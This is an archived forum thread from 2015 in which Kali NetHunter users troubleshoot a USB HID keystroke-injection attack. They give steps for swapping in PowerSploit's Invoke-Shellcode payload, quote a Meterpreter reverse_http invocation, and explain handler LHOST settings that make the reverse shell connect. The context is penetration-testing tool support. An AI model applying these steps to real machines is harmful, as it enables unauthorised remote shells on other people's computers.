View Full Version : HID Keyboard attack produces strange error in other kali machine

2015-05-04, 22:11
After I updated my Kali Nethunter (Expecting bugs) I decided to test out HID Keyboard and it produces this error on my other machine.
Started HTTPS reverse handler on
Starting the payload handler... Request received for /INITM
Unknown Request to /INITM and something about firefox. Anyone else experiencing these errors?

2015-07-10, 08:19
I'm having the same issue, Nexus 7 2013. I'm attempting to run the handler on the tablet as well. Running the HID attack causes powershell to crash after everything is input.

2015-07-18, 17:37
you have found a bug yet
May be because someone hacked your already

2015-07-18, 23:59
Well I've tried it on 3 different test boxes which should have had no exposure before and gotten the same error. Different ports etc.

2015-07-22, 06:11
I've now bypassed the issue using a modified ducky script as my nethunter HID attack to gain a shell. I suspect this issue can be fixed by using an older source shell. Will try modifying the source to the successfully tested shell and will report back.

2015-07-29, 08:38
Hey guys,

I am having the same issue .... anyone found a solution for this ?

2015-07-30, 06:25
Stoof, I can't tell you how to fix it, but I can tell you how implemented the workaround to do virtually the same thing as the stock hid attack. Using the Rubber Ducky HID scripting that is also part of Nethunter you can use:


It takes some small setup however as someone else has pointed out on the forums the key sets are out of date, most notably not entering certain characters like underscore which screws up the injection.

Keeping that in mind here are the steps to follow:

-Open up the HID Ducky Script Attacks in the Nethunter App
-Set your language to "British English" in the drop down menu in the upper right
-Copy over and implement the Ducky Script in the above link, placing your own IP and ports etc in the applicable spaces BUT there are a few items that must be changed.
**Change all instances of quotation marks to the @ sign and visa versa
**Change the bit.ly link to your preferred meterpreter shell code or make a tinyurl of https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

Not changing the bit.ly link will cause you to run a program saying you are silly to trust something ready to go from the internet without checking first.

After you've done that you should be able to use the attack, set up your handler to handle reverse_https and you should be good to go. In all likelihood the script can probably be changed so as not to make a file and successively run it but to run it immediately but I am somewhat short on time to alter that.

Should it be desired I can post the ready to go ducky code of the attack or go into more detail. I'm still seeing if I can make a fix for the main HID attack but this is the workaround I've come up with in the meantime that does the same basic thing.


2015-07-30, 07:00
Hi Swacky,

Thanks for you reply.
In the meanwhile I found a solution to fix the keyboard HID attack, well ... sort off.... Now the powershell does not crash anymore, and a meterpreter shell is spawned, however it closes after approx 10 seconds with the message : "Meterpreter session 1 is not valid and will be closed"
What I did was replace the payload script in nethunter, which is in fact the powersploit invoke-shellcode.ps1 script.
steps taken :

1. Open nethunter on the nexus and go to kali launcher
2. Choose option Launch Kali in Terminal
3. Browse to the apache folder "cd /var/www"
4. Edit the invoke-shellcode script "nano payload"
5. copy the last line in the file which says "Invoke-Shellcode -Payload windows/meterpreter/reverse_http........."
6. Download the latest version of the invoke-shellcode.ps1 script here : "https://github.com/mattifestation/PowerSploit/tree/master/CodeExecution/Invoke--Shellcode.ps1"
7. Edit the downloaded script file and paste the line you copied from the payload file at the end of the downloaded script file and save it.
8. Make sure you put the downloaded script file in the /var/www folder , rename the original payload to payload.orig "mv payload payload.orig" and rename the newly downloaded one to payload "mv Invoke--Shellcode.ps1 payload"
9. Make sure the file permissions are set correctly "chmod --reference payload.orig payload"

When you run the HID attack script now like you would normally do, you will see that it works.... but the meterpreter session will die after xx seconds with the message Meterpreter session x is not valid and will be closed....

The box where I run my listener on is a raspberry pi running metasploit v4.11.4-2015071402 ... maybe that is the problem ...I did not had the chance to test it with a different Kali installation yet.
So one step closer, but not quite there yet....


2015-07-30, 11:13
Ah I did have that problem briefly as well, and it was solved by an offhand tweet by one of the creators of metasploit that I found while googling the error myself. To paraphrase the problem is that the handler is giving a bad LHOST IP. Perhaps something like The /24 part is entirely unnecessary and creates that error when I use that as the LHOST on the reverse handler.

The relevant post was: https://twitter.com/hdmoore/status/598142217031688193

Hope that helps

2015-07-30, 12:37
You are right Swacky12, it was an LHOST IP problem on the handler side, even if you have portforwarding enabled you should still enter the external WAN IP as LHOST. Got it sorted now .
So I have the USB HID attack fully working, and I can use the ducky script as backup, both are working fine :-)

2015-07-30, 23:04
Awesome, and thanks to you we have an easy guide to the stock fix. I don't suppose you can make a pull request on the Nethunter github for the fix for future versions?

2015-07-31, 13:37
Pull request created for this fix ;-)